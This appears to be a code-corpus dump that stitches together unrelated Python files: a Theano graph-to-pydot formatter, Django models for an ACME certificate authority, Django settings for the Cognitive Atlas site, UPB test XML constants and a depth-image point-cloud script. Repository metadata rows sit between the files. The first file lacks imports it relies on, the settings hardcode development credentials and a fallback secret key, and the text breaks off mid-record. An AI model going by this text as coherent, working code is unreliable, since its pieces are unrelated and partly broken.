from theano.compile import Function, builders
from theano.gof.fg import FunctionGraph
from theano.gof.graph import Apply, Constant, Variable
from theano.gof.graph import inputs as graph_inputs
from theano.printing import pydot_imported, pydot_imported_msg
try:
from theano.printing import pd
except ImportError:
pass
class PyDotFormatter:
"""Create `pydot` graph object from Theano function.
Parameters
----------
compact : bool
if True, will remove intermediate variables without name.
Attributes
----------
node_colors : dict
Color table of node types.
apply_colors : dict
Color table of apply nodes.
shapes : dict
Shape table of node types.
"""
def __init__(self, compact=True):
"""Construct PyDotFormatter object."""
if not pydot_imported:
raise ImportError("Failed to import pydot. " + pydot_imported_msg)
self.compact = compact
self.node_colors = {
"input": "limegreen",
"constant_input": "SpringGreen",
"shared_input": "YellowGreen",
"output": "dodgerblue",
"unused": "lightgrey",
}
self.apply_colors = {
"GpuFromHost": "red",
"HostFromGpu": "red",
"Scan": "yellow",
"Shape": "cyan",
"IfElse": "magenta",
"Elemwise": "#FFAABB", # dark pink
"Subtensor": "#FFAAFF", # purple
"Alloc": "#FFAA22",
} # orange
self.shapes = {"input": "box", "output": "box", "apply": "ellipse"}
self.__node_prefix = "n"
def __add_node(self, node):
"""Add new node to node list and return unique id.
Parameters
----------
node : Theano graph node
Apply node, tensor variable, or shared variable in compute graph.
Returns
-------
str
Unique node id.
"""
assert node not in self.__nodes
_id = f"{self.__node_prefix}{len(self.__nodes) + 1}"
self.__nodes[node] = _id
return _id
def __node_id(self, node):
"""Return unique node id.
Parameters
----------
node : Theano graph node
Apply node, tensor variable, or shared variable in compute graph.
Returns
-------
str
Unique node id.
"""
if node in self.__nodes:
return self.__nodes[node]
else:
return self.__add_node(node)
def __call__(self, fct, graph=None):
"""Create pydot graph from function.
Parameters
----------
fct : theano.compile.function.types.Function
A compiled Theano function, variable, apply or a list of variables.
graph: pydot.Dot
`pydot` graph to which nodes are added. Creates new one if
undefined.
Returns
-------
pydot.Dot
Pydot graph of `fct`
"""
if graph is None:
graph = pd.Dot()
self.__nodes = {}
profile = None
if isinstance(fct, Function):
profile = getattr(fct, "profile", None)
fgraph = fct.maker.fgraph
elif isinstance(fct, FunctionGraph):
fgraph = fct
else:
if isinstance(fct, Variable):
fct = [fct]
elif isinstance(fct, Apply):
fct = fct.outputs
assert isinstance(fct, (list, tuple))
assert all(isinstance(v, Variable) for v in fct)
fgraph = FunctionGraph(inputs=graph_inputs(fct), outputs=fct)
outputs = fgraph.outputs
topo = fgraph.toposort()
outputs = list(outputs)
# Loop over apply nodes
for node in topo:
nparams = {}
__node_id = self.__node_id(node)
nparams["name"] = __node_id
nparams["label"] = apply_label(node)
nparams["profile"] = apply_profile(fgraph, node, profile)
nparams["node_type"] = "apply"
nparams["apply_op"] = nparams["label"]
nparams["shape"] = self.shapes["apply"]
use_color = None
for opName, color in self.apply_colors.items():
if opName in node.op.__class__.__name__:
use_color = color
if use_color:
nparams["style"] = "filled"
nparams["fillcolor"] = use_color
nparams["type"] = "colored"
pd_node = dict_to_pdnode(nparams)
graph.add_node(pd_node)
# Loop over input nodes
for id, var in enumerate(node.inputs):
var_id = self.__node_id(var.owner if var.owner else var)
if var.owner is None:
vparams = {
"name": var_id,
"label": var_label(var),
"node_type": "input",
}
if isinstance(var, Constant):
vparams["node_type"] = "constant_input"
elif isinstance(var, theano.tensor.sharedvar.TensorSharedVariable):
vparams["node_type"] = "shared_input"
vparams["dtype"] = type_to_str(var.type)
vparams["tag"] = var_tag(var)
vparams["style"] = "filled"
vparams["fillcolor"] = self.node_colors[vparams["node_type"]]
vparams["shape"] = self.shapes["input"]
pd_var = dict_to_pdnode(vparams)
graph.add_node(pd_var)
edge_params = {}
if hasattr(node.op, "view_map") and id in reduce(
list.__add__, node.op.view_map.values(), []
):
edge_params["color"] = self.node_colors["output"]
elif hasattr(node.op, "destroy_map") and id in reduce(
list.__add__, node.op.destroy_map.values(), []
):
edge_params["color"] = "red"
edge_label = vparams["dtype"]
if len(node.inputs) > 1:
edge_label = str(id) + " " + edge_label
pdedge = pd.Edge(var_id, __node_id, label=edge_label, **edge_params)
graph.add_edge(pdedge)
# Loop over output nodes
for id, var in enumerate(node.outputs):
var_id = self.__node_id(var)
if var in outputs or len(fgraph.clients[var]) == 0:
vparams = {
"name": var_id,
"label": var_label(var),
"node_type": "output",
"dtype": type_to_str(var.type),
"tag": var_tag(var),
"style": "filled",
}
if len(fgraph.clients[var]) == 0:
vparams["fillcolor"] = self.node_colors["unused"]
else:
vparams["fillcolor"] = self.node_colors["output"]
vparams["shape"] = self.shapes["output"]
pd_var = dict_to_pdnode(vparams)
graph.add_node(pd_var)
graph.add_edge(pd.Edge(__node_id, var_id, label=vparams["dtype"]))
elif var.name or not self.compact:
graph.add_edge(pd.Edge(__node_id, var_id, label=vparams["dtype"]))
# Create sub-graph for OpFromGraph nodes
if isinstance(node.op, builders.OpFromGraph):
subgraph = pd.Cluster(__node_id)
gf = PyDotFormatter()
# Use different node prefix for sub-graphs
gf.__node_prefix = __node_id
node.op.prepare_node(node, None, None, "py")
gf(node.op.fn, subgraph)
graph.add_subgraph(subgraph)
pd_node.get_attributes()["subg"] = subgraph.get_name()
def format_map(m):
return str([list(x) for x in m])
# Inputs mapping
ext_inputs = [self.__node_id(x) for x in node.inputs]
int_inputs = [gf.__node_id(x) for x in node.op.local_inputs]
assert len(ext_inputs) == len(int_inputs)
h = format_map(zip(ext_inputs, int_inputs))
pd_node.get_attributes()["subg_map_inputs"] = h
# Outputs mapping
ext_outputs = [self.__node_id(x) for x in node.outputs]
int_outputs = [gf.__node_id(x) for x in node.op.local_outputs]
assert len(ext_outputs) == len(int_outputs)
h = format_map(zip(int_outputs, ext_outputs))
pd_node.get_attributes()["subg_map_outputs"] = h
return graph
def var_label(var, precision=3):
"""Return label of variable node."""
if var.name is not None:
return var.name
elif isinstance(var, Constant):
h = np.asarray(var.data)
is_const = False
if h.ndim == 0:
is_const = True
h = np.array([h])
dstr = np.array2string(h, precision=precision)
if "\n" in dstr:
dstr = dstr[: dstr.index("\n")]
if is_const:
dstr = dstr.replace("[", "").replace("]", "")
return dstr
else:
return type_to_str(var.type)
def var_tag(var):
"""Parse tag attribute of variable node."""
tag = var.tag
if hasattr(tag, "trace") and len(tag.trace) and len(tag.trace[0]) == 4:
if isinstance(tag.trace[0][0], (tuple, list)):
path, line, _, src = tag.trace[0][-1]
else:
path, line, _, src = tag.trace[0]
path = os.path.basename(path)
path = path.replace("<", "")
path = path.replace(">", "")
src = src.encode()
return [path, line, src]
else:
return None
def apply_label(node):
"""Return label of apply node."""
return node.op.__class__.__name__
def apply_profile(fgraph, node, profile):
"""Return apply profiling informaton."""
if not profile or profile.fct_call_time == 0:
return None
time = profile.apply_time.get((fgraph, node), 0)
call_time = profile.fct_call_time
return [time, call_time]
def broadcastable_to_str(b):
"""Return string representation of broadcastable."""
named_broadcastable = {
(): "scalar",
(False,): "vector",
(False, True): "col",
(True, False): "row",
(False, False): "matrix",
}
if b in named_broadcastable:
bcast = named_broadcastable[b]
else:
bcast = ""
return bcast
def dtype_to_char(dtype):
"""Return character that represents data type."""
dtype_char = {
"complex64": "c",
"complex128": "z",
"float32": "f",
"float64": "d",
"int8": "b",
"int16": "w",
"int32": "i",
"int64": "l",
}
if dtype in dtype_char:
return dtype_char[dtype]
else:
return "X"
def type_to_str(t):
"""Return str of variable type."""
if not hasattr(t, "broadcastable"):
return str(t)
s = broadcastable_to_str(t.broadcastable)
if s == "":
s = str(t.dtype)
else:
s = dtype_to_char(t.dtype) + s
return s
def dict_to_pdnode(d):
"""Create pydot node from dict."""
e = dict()
for k, v in d.items():
if v is not None:
if isinstance(v, list):
v = "\t".join([str(x) for x in v])
else:
v = str(v)
v = str(v)
v = v.replace('"', "'")
e[k] = v
pynode = pd.Node(**e)
return pynode
| 32.336022
| 87
| 0.521157
|
94c6bdae97eb959bd08af7c11f91fa2aca3ce388
| 10,530
|
py
|
Python
|
python-ca/bjorn/models.py
|
AS207960/bjorn
|
8293b453df544822011b34b1a72bb41e941417dd
|
[
"MIT"
] | 4
|
2021-09-21T08:13:52.000Z
|
2022-02-17T20:29:20.000Z
|
python-ca/bjorn/models.py
|
AS207960/bjorn
|
8293b453df544822011b34b1a72bb41e941417dd
|
[
"MIT"
] | null | null | null |
python-ca/bjorn/models.py
|
AS207960/bjorn
|
8293b453df544822011b34b1a72bb41e941417dd
|
[
"MIT"
] | 1
|
2021-09-24T15:30:36.000Z
|
2021-09-24T15:30:36.000Z
|
from django.db import models
from django.contrib import admin
from django.utils import timezone
import secrets
import base64
import uuid
import cryptography.x509
import google.protobuf.json_format
from . import order_pb2
class Account(models.Model):
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
name = models.CharField(max_length=255)
def __str__(self):
return self.name
def make_account_key():
return secrets.token_bytes(32)
class AccountKey(models.Model):
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
account = models.ForeignKey(Account, on_delete=models.CASCADE, related_name='keys')
name = models.CharField(max_length=255)
secret = models.BinaryField(default=make_account_key)
@admin.display(description='Secret (Base64)')
def secret_str(self):
return base64.b64encode(self.secret).decode()
def __str__(self):
return f"{self.account.name}: {self.name}"
class Order(models.Model):
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
account = models.ForeignKey(Account, on_delete=models.CASCADE, blank=True, null=True, related_name='orders')
acme_account_id = models.TextField(blank=True, null=True)
expires_at = models.DateTimeField()
csr = models.BinaryField(blank=True, null=True)
certificate = models.OneToOneField('Certificate', on_delete=models.SET_NULL, blank=True, null=True, related_name='orders')
@property
def rpc_status(self):
authorizations = list(self.authorizations.all())
if self.certificate:
return order_pb2.OrderValid
elif self.csr:
return order_pb2.OrderProcessing
elif self.expires_at <= timezone.now():
return order_pb2.OrderInvalid
elif all(a.authorization.rpc_status == order_pb2.AuthorizationValid for a in authorizations):
return order_pb2.OrderReady
elif any(a.authorization.rpc_status in (
order_pb2.AuthorizationRevoked,
order_pb2.AuthorizationDeactivated,
order_pb2.AuthorizationInvalid,
order_pb2.AuthorizationExpired,
) for a in authorizations):
return order_pb2.OrderInvalid
else:
return order_pb2.OrderPending
def to_rpc(self):
authorizations = list(self.authorizations.all())
o = order_pb2.Order(
id=self.id.bytes,
identifiers=[i.to_rpc() for i in self.identifiers.all()],
not_before=None,
not_after=None,
status=self.rpc_status,
authorizations=[a.authorization.id.bytes for a in authorizations],
)
o.expires.FromDatetime(self.expires_at)
if self.certificate:
o.certificate_id.value = self.certificate.id.bytes
return o
ID_DNS = "dns"
IDENTIFIERS = (
(ID_DNS, "DNS"),
)
def id_to_rpc(id_type, identifier):
return order_pb2.Identifier(
identifier=identifier,
id_type=order_pb2.DNSIdentifier if id_type == ID_DNS else order_pb2.UnknownIdentifier
)
class OrderIdentifier(models.Model):
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
order = models.ForeignKey(Order, on_delete=models.CASCADE, related_name='identifiers')
id_type = models.CharField(max_length=64, choices=IDENTIFIERS)
identifier = models.TextField()
def __str__(self):
return f"{self.get_id_type_display()}: {self.identifier}"
def to_rpc(self):
return id_to_rpc(self.id_type, self.identifier)
class Authorization(models.Model):
STATE_PENDING = "p"
STATE_VALID = "v"
STATE_INVALID = "i"
STATES = (
(STATE_PENDING, "Pending"),
(STATE_VALID, "Valid"),
(STATE_INVALID, "Invalid"),
)
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
account = models.ForeignKey(Account, on_delete=models.CASCADE, blank=True, null=True, related_name='authorizations')
acme_account_id = models.TextField(blank=True, null=True)
state = models.CharField(max_length=1, choices=STATES)
expires_at = models.DateTimeField()
deactivated = models.BooleanField(blank=True)
revoked = models.BooleanField(blank=True)
id_type = models.CharField(max_length=64, choices=IDENTIFIERS)
identifier = models.TextField()
@property
def rpc_status(self):
if self.revoked:
return order_pb2.AuthorizationRevoked
elif self.deactivated:
return order_pb2.AuthorizationDeactivated
elif self.expires_at <= timezone.now():
return order_pb2.AuthorizationExpired
elif self.state == self.STATE_INVALID:
return order_pb2.AuthorizationInvalid
elif self.state == self.STATE_VALID:
return order_pb2.AuthorizationValid
else:
return order_pb2.AuthorizationPending
@property
def id_rpc(self):
return id_to_rpc(self.id_type, self.identifier)
def to_rpc(self):
challenges = []
if self.state == self.STATE_INVALID:
failed_challenge = self.challenges.filter(error__isnull=False).first()
challenges.append(failed_challenge.to_rpc())
elif self.state == self.STATE_VALID:
valid_challenge = self.challenges.filter(validated_at__isnull=False).first()
challenges.append(valid_challenge.to_rpc())
else:
for challenge in self.challenges.all():
challenges.append(challenge.to_rpc())
a = order_pb2.Authorization(
id=self.id.bytes,
status=self.rpc_status,
identifier=self.id_rpc,
challenges=challenges,
)
a.expires.FromDatetime(self.expires_at)
return a
class AuthorizationChallenge(models.Model):
TYPE_HTTP01 = "h"
TYPE_DNS01 = "d"
TYPE_TLSALPN01 = "t"
TYPES = (
(TYPE_HTTP01, "http-01"),
(TYPE_DNS01, "dns-01"),
(TYPE_TLSALPN01, "tls-alpn-01"),
)
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
authorization = models.ForeignKey(Authorization, on_delete=models.CASCADE, related_name='challenges')
validated_at = models.DateTimeField(blank=True, null=True)
processing = models.BooleanField(blank=True, default=False)
error = models.JSONField(blank=True, null=True)
type = models.CharField(max_length=1, choices=TYPES)
token = models.CharField(max_length=255, null=True, blank=True)
@property
def rpc_status(self):
if self.error:
return order_pb2.ChallengeInvalid
elif self.validated_at:
return order_pb2.ChallengeValid
elif self.processing:
return order_pb2.ChallengeProcessing
else:
return order_pb2.ChallengePending
def to_rpc(self):
if self.type == self.TYPE_HTTP01:
challenge_type = order_pb2.ChallengeHTTP01
elif self.type == self.TYPE_DNS01:
challenge_type = order_pb2.ChallengeDNS01
elif self.type == self.TYPE_TLSALPN01:
challenge_type = order_pb2.ChallengeTLSALPN01
else:
challenge_type = None
errors = None
if self.error:
errors = order_pb2.ErrorResponse()
google.protobuf.json_format.ParseDict(self.error, errors, ignore_unknown_fields=True)
a = order_pb2.Challenge(
id=self.id.bytes,
status=self.rpc_status,
type=challenge_type,
error=errors,
)
if self.validated_at:
a.validated.FromDatetime(self.validated_at)
if self.token:
a.token.value = self.token
return a
class OrderAuthorization(models.Model):
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
order = models.ForeignKey(Order, on_delete=models.CASCADE, related_name='authorizations')
authorization = models.ForeignKey(Authorization, on_delete=models.PROTECT, related_name='orders')
class IssuingCert(models.Model):
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
issued_by = models.ForeignKey('IssuingCert', on_delete=models.PROTECT, related_name='certificates', null=True, blank=True)
name = models.CharField(max_length=255)
cert = models.BinaryField()
crl_url = models.URLField(blank=True, null=True)
cert_url = models.URLField(blank=True, null=True)
ocsp_responder_url = models.URLField(blank=True, null=True)
def __str__(self):
return self.name
def cert_obj(self):
return cryptography.x509.load_der_x509_certificate(self.cert)
class Certificate(models.Model):
RevocationUnspecified = 1
RevocationKeyCompromise = 2
RevocationCACompromise = 3
RevocationAffiliationChanged = 4
RevocationSuperseded = 5
RevocationCessationOfOperation = 6
RevocationCertificateHold = 7
RevocationRemoveFromCRL = 8
RevocationPrivilegeWithdrawn = 9
RevocationAACompromise = 10
REVOCATION_REASONS = (
(RevocationUnspecified, "Unspecified"),
(RevocationKeyCompromise, "Key compromise"),
(RevocationCACompromise, "CA compromise"),
(RevocationAffiliationChanged, "Affiliation changed"),
(RevocationSuperseded, "Superseded"),
(RevocationCessationOfOperation, "Cessation of operation"),
(RevocationCertificateHold, "Certificate hold"),
(RevocationRemoveFromCRL, "Remove from CRL"),
(RevocationPrivilegeWithdrawn, "Privilege withdrawn"),
(RevocationAACompromise, "AA compromise"),
)
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
ee_cert = models.BinaryField()
issued_at = models.DateTimeField()
issued_by = models.ForeignKey(IssuingCert, on_delete=models.PROTECT, related_name='ee_certificates')
revoked = models.BooleanField(blank=True, default=False)
revocation_reason = models.PositiveSmallIntegerField(blank=True, null=True, choices=REVOCATION_REASONS)
revocation_timestamp = models.DateTimeField(blank=True, null=True)
invalidity_date = models.DateTimeField(blank=True, null=True)
def __str__(self):
serial = str(self.id.hex)
return ":".join(serial[i:i+2] for i in range(0, len(serial), 2))
def ee_cert_obj(self):
return cryptography.x509.load_der_x509_certificate(self.ee_cert)
| 35.454545
| 126
| 0.683761
|
073de9b6ddaf1493b757625b72c109f5457e525c
| 6,857
|
py
|
Python
|
cognitive/settings.py
|
poldracklab/cogat
|
9eeaa2925c4bd65962e75ccb66baba0617e595cd
|
[
"MIT"
] | 2
|
2017-09-20T04:07:50.000Z
|
2018-05-02T16:19:35.000Z
|
cognitive/settings.py
|
poldracklab/cogat
|
9eeaa2925c4bd65962e75ccb66baba0617e595cd
|
[
"MIT"
] | 119
|
2017-03-10T19:00:45.000Z
|
2020-06-22T14:03:16.000Z
|
cognitive/settings.py
|
poldracklab/cogat
|
9eeaa2925c4bd65962e75ccb66baba0617e595cd
|
[
"MIT"
] | 2
|
2017-03-13T20:02:06.000Z
|
2018-05-02T16:19:40.000Z
|
"""
Django settings for cognitive atlas project.
Generated by 'django-admin startproject' using Django 1.9.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import sys
import os
from distutils.util import strtobool
from os.path import join, abspath, dirname
from py2neo import Graph
# Just for local development - will read this from secrets
graph = Graph("http://graphdb:7474", auth=("neo4j", "test"))
DOMAIN = "http://www.cognitiveatlas.org"
# PATH vars
PROJECT_ROOT = join(abspath(dirname(__file__)), ".")
sys.path.insert(0, join(abspath(PROJECT_ROOT), 'apps'))
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
ALLOWED_HOSTS = ["*"]
SITE_ID = 1
# Application definition
INSTALLED_APPS = [
'cognitive.apps.main',
'cognitive.apps.atlas',
'cognitive.apps.users',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.sites',
'django.contrib.admin',
]
THIRD_PARTY_APPS = [
'rest_framework',
'rest_framework.authtoken',
'crispy_forms',
]
# 'allauth',
# 'allauth.account',
# 'allauth.socialaccount',
# 'allauth.socialaccount.providers.dropbox',
# 'allauth.socialaccount.providers.dropbox_oauth2',
# 'allauth.socialaccount.providers.facebook',
# 'allauth.socialaccount.providers.github',
# 'allauth.socialaccount.providers.gitlab',
# 'allauth.socialaccount.providers.google',
# 'allauth.socialaccount.providers.linkedin',
# 'allauth.socialaccount.providers.linkedin_oauth2',
# 'allauth.socialaccount.providers.openid',
# 'allauth.socialaccount.providers.orcid',
# 'allauth.socialaccount.providers.stackexchange',
# 'allauth.socialaccount.providers.twitter',
INSTALLED_APPS += THIRD_PARTY_APPS
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'cognitive.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.contrib.auth.context_processors.auth',
'django.template.context_processors.debug',
'django.template.context_processors.i18n',
'django.template.context_processors.media',
'django.template.context_processors.request',
'django.template.context_processors.static',
'django.template.context_processors.tz',
'django.contrib.messages.context_processors.messages',
],
},
},
]
# CUSTOM CONTEXT PROCESSORS
TEMPLATES[0]['OPTIONS']['context_processors'].append(
"main.context_processors.counts_processor")
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
# 'allauth.account.auth_backends.AuthenticationBackend',
)
WSGI_APPLICATION = 'cognitive.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': os.environ.get('POSTGRES_NAME', ''),
'USER': os.environ.get('POSTGRES_USER', ''),
'PASSWORD': os.environ.get('POSTGRES_PASSWORD', ''),
'HOST': os.environ.get('POSTGRES_HOST', ''),
'PORT': os.environ.get('POSTGRES_PORT', ''),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
PASSWORD_HASHERS = [
'django.contrib.auth.hashers.PBKDF2PasswordHasher',
'django.contrib.auth.hashers.PBKDF2SHA1PasswordHasher',
'django.contrib.auth.hashers.Argon2PasswordHasher',
'django.contrib.auth.hashers.BCryptSHA256PasswordHasher',
'django.contrib.auth.hashers.BCryptPasswordHasher',
'django.contrib.auth.hashers.UnsaltedSHA1PasswordHasher',
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
MEDIA_ROOT = '/var/www/assets'
MEDIA_URL = '/assets/'
STATIC_ROOT = '/var/www/static'
STATIC_URL = '/static/'
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
CRISPY_TEMPLATE_PACK = 'bootstrap3'
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
}
}
AUTH_USER_MODEL = 'users.User'
SECRET_KEY = os.environ.get(
'DJANGO_SECRET_KEY', 'verybadnotgoodsecretkeythatisntsecret')
DEBUG = strtobool(os.environ.get('DJANGO_DEBUG', 'False'))
LOGIN_REDIRECT_URL = '/'
LOGOUT_REDIRECT_URL = '/logged_out/'
REST_FRAMEWORK = {
'DEFAULT_PERMISSION_CLASSES': [
'rest_framework.permissions.IsAuthenticatedOrReadOnly',
],
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework.authentication.BasicAuthentication',
'rest_framework.authentication.SessionAuthentication',
'rest_framework.authentication.TokenAuthentication',
),
}
USE_RECAPTCHA = strtobool(os.environ.get('USE_RECAPTCHA', 'False'))
GOOGLE_RECAPTCHA_SECRET_KEY = os.environ.get('GOOGLE_RECAPTCHA_SECRET_KEY', '')
NOTIFY_EMAILS = [i for i in os.environ.get("NOTIFY_EMAILS", "").split(" ")]
EMAIL_HOST = os.environ.get("EMAIL_HOST", '')
EMAIL_PORT = os.environ.get("EMAIL_PORT", '')
EMAIL_HOST_USER = os.environ.get("EMAIL_HOST_USER", '')
EMAIL_HOST_PASSWORD = os.environ.get("EMAIL_HOST_PASSWORD", '')
EMAIL_USE_TSL = True
| 29.943231
| 91
| 0.710661
|
1274adb4b892c5ae2abf74b3b013d523a16f9bea
| 917
|
py
|
Python
|
src/Modules/Families/UPB/test/xml_upb.py
|
bopopescu/PyHouse_1
|
6444ed0b4c38ab59b9e419e4d54d65d598e6a54e
|
[
"MIT"
] | 1
|
2016-09-21T19:30:21.000Z
|
2016-09-21T19:30:21.000Z
|
src/Modules/Families/UPB/test/xml_upb.py
|
bopopescu/PyHouse_1
|
6444ed0b4c38ab59b9e419e4d54d65d598e6a54e
|
[
"MIT"
] | null | null | null |
src/Modules/Families/UPB/test/xml_upb.py
|
bopopescu/PyHouse_1
|
6444ed0b4c38ab59b9e419e4d54d65d598e6a54e
|
[
"MIT"
] | 1
|
2020-07-23T11:13:36.000Z
|
2020-07-23T11:13:36.000Z
|
"""
@name: PyHouse/src/Modules/Families/UPB/test/xml_upb.py
@author: D. Brian Kimmel
@contact: D.BrianKimmel@gmail.com
@copyright: (c) 2014-2015 by D. Brian Kimmel
@license: MIT License
@note: Created on Nov 9, 2014
@Summary:
"""
TESTING_UPB_ADDRESS = '255'
TESTING_UPB_NETWORK = '6'
TESTING_UPB_PASSWORD = '1253'
L_UPB_ADDRESS = ' <UPBAddress>' + TESTING_UPB_ADDRESS + '</UPBAddress>'
L_UPB_NETWORK = ' <UPBNetworkID>' + TESTING_UPB_NETWORK + '</UPBNetworkID>'
L_UPB_PASSWORD = ' <UPBPassword>' + TESTING_UPB_PASSWORD + '</UPBPassword>'
XML_UPB = '\n'.join([
L_UPB_ADDRESS,
L_UPB_NETWORK,
L_UPB_PASSWORD
])
UPB_XSD = """
<xs:element type="xs:byte" name="UPBNetworkID" minOccurs="0"/>
<xs:element type="xs:short" name="UPBPassword" minOccurs="0"/>
<xs:element type="xs:short" name="UPBAddress" minOccurs="0"/>
"""
# ## END DBK
| 27.787879
| 78
| 0.649945
|
99b928d14cd3334a98584fd38ed58dfe30c26bab
| 3,367
|
py
|
Python
|
statistic_tools.py
|
shokah/pytorch-deeplab-xception
|
eda759b6935f048c80ba00981686eaf08c4366ae
|
[
"MIT"
] | null | null | null |
statistic_tools.py
|
shokah/pytorch-deeplab-xception
|
eda759b6935f048c80ba00981686eaf08c4366ae
|
[
"MIT"
] | null | null | null |
statistic_tools.py
|
shokah/pytorch-deeplab-xception
|
eda759b6935f048c80ba00981686eaf08c4366ae
|
[
"MIT"
] | null | null | null |
import os
from PIL import Image
import numpy as np
import matplotlib.pyplot as plt
def recursive_glob(rootdir='.', suffix=''):
"""Performs recursive glob with given suffix and rootdir
:param rootdir is the root directory
:param suffix is the suffix to be searched
"""
return [os.path.join(looproot, filename)
for looproot, _, filenames in os.walk(rootdir)
for filename in filenames if filename.endswith(suffix)]
def split_data(data):
return
def get_historgram(img_path, min_depth=0, max_depth=655.5):
depth = np.asarray(Image.open(img_path))
depth = decode_apollo(np.resize(depth, (513, 513, 3)))
plt.hist(depth, bins=655, range=(min_depth, max_depth), density=True, histtype='step')
plt.ylabel('Probability')
# plt.show()
def decode_apollo(depth_im):
R = depth_im[:, :, 0] / 255
G = depth_im[:, :, 1] / 255
real_depth = (R + G / 255.0) * 655.36
return real_depth
def depth_to_pointcloud(depth, calib_matrix, save_path='points.txt'):
points = []
k_inv = np.linalg.inv(calib_matrix)
xyz = np.zeros((depth.shape[0], depth.shape[1], 3))
for i in range(depth.shape[0]):
for j in range(depth.shape[1]):
p = depth[i, j] * k_inv.dot(np.array([j, i, 1]))
points.append(p)
xyz[i, j] = p
points = np.array(points)
np.savetxt(save_path, points)
print("point cloud created...\n")
return xyz
if __name__ == '__main__':
# root = r"D:\Shai_Schneider\Apollo_dataset\val\Depth"
# files = recursive_glob(root)
# random_images = np.random.choice(len(files), size=len(files) // 10, replace=False)
#
# for file in random_images:
# get_historgram(files[file])
# # p = r"D:\Shai_Schneider\Apollo_dataset\val\Depth\09-00\CLEAR_SKY\DEGRADATION\With_Pedestrian\With_TrafficBarrier\Urban_Straight_Road\Traffic_093\0000000.png"
# # get_historgram(p, min_depth=0, max_depth=656)
# # p = r"D:\Shai_Schneider\Apollo_dataset\val\Depth\09-00\CLEAR_SKY\DEGRADATION\With_Pedestrian\With_TrafficBarrier\Downtown\Traffic_093\0000005.png"
# # get_historgram(p, min_depth=0, max_depth=656)
# # p=r"D:\Shai_Schneider\Apollo_dataset\val\Depth\09-00\CLEAR_SKY\DEGRADATION\With_Pedestrian\With_TrafficBarrier\Downtown\Traffic_095\0000019.png"
# # get_historgram(p, min_depth=0, max_depth=656)
# # p=r"D:\Shai_Schneider\Apollo_dataset\val\Depth\09-00\CLEAR_SKY\DEGRADATION\With_Pedestrian\With_TrafficBarrier\Downtown\Traffic_095\0000059.png"
# # get_historgram(p, min_depth=0, max_depth=656)
# plt.show()
img_path_predicted = r"D:\Shai_Schneider\pytorch-deeplab-xception\examples\example_2stage.png"
img_path_gt = r"D:\Shai_Schneider\Apollo_dataset\test\Depth\13-00\CLEAR_SKY\NO_DEGRADATION\With_Pedestrian\With_TrafficBarrier\Downtown\Traffic_117\0000000.png"
depth = np.asarray(Image.open(img_path_predicted))
depth = decode_apollo(depth)
K = [[2015.0, 0, 960.0],
[0, 2015.0, 540.0],
[0, 0, 1]]
xyz_pred = depth_to_pointcloud(depth, K, 'two_stage_points.txt')
depth = np.asarray(Image.open(img_path_gt))
depth = decode_apollo(depth)
K = [[2015.0, 0, 960.0],
[0, 2015.0, 540.0],
[0, 0, 1]]
xyz_gt = depth_to_pointcloud(depth, K, 'gt_points.txt')
l1 = np.linalg.norm(xyz_gt-xyz_pred)
| 40.083333
| 165
| 0.683398
|
27ed983ed5ce0cb0266666de73afcdc61d688cb9
| 505
|
py
|
Python
|
env/lib/python3.8/site-packages/plotly/validators/layout/polar/radialaxis/tickformatstop/_value.py
|
acrucetta/Chicago_COVI_WebApp
|
a37c9f492a20dcd625f8647067394617988de913
|
[
"MIT",
"Unlicense"
] | 76
|
2020-07-06T14:44:05.000Z
|
2022-02-14T15:30:21.000Z
|
env/lib/python3.8/site-packages/plotly/validators/layout/polar/radialaxis/tickformatstop/_value.py
|
acrucetta/Chicago_COVI_WebApp
|
a37c9f492a20dcd625f8647067394617988de913
|
[
"MIT",
"Unlicense"
] | 11
|
